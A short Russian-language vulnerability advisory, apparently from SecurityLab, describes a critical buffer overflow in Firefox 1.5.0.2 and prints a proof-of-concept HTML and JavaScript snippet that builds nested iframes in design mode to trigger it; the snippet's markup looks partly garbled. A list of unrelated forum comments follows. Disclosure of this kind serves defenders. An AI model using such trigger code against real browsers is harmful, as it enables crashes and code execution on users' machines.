Программа: Mozilla Firefox 1.5.0.2, возможно, более ранние версии.
Опасность: Критическая
Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.
Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:
<textarea cols=«0» rows=«0» id=«x_OtherInfo» name=«x_OtherInfo»>
</textarea>
<script type=«text/javascript»>
</script>
var textarea = document.getElementsByName(«x_OtherInfo»);
textarea=textarea.item(0);
var htmlarea = document.createElement(«div»);
htmlarea.className = «htmlarea»;
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement(«iframe»);
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = «on»;
doc.open();
doc.write(«<iframe src=»>»);
iframe.contentWindow.focus()
doc.close();
URL производителя: mozilla.com
Решение: Способов устранения уязвимости не существует в настоящее время.
* Firefox Remote Code Execution and DoS 1.5.0.2
источник: SecurityLab
</iframe>
Последние комментарии
- OlegL, 17 декабря в 15:00 → Перекличка 21
- REDkiy, 8 июня 2023 года в 9:09 → Как «замокать» файл для юниттеста в Python? 2
- fhunter, 29 ноября 2022 года в 2:09 → Проблема с NO_PUBKEY: как получить GPG-ключ и добавить его в базу apt? 6
- Иванн, 9 апреля 2022 года в 8:31 → Ассоциация РАСПО провела первое учредительное собрание 1
- Kiri11.ADV1, 7 марта 2021 года в 12:01 → Логи catalina.out в TomCat 9 в формате JSON 1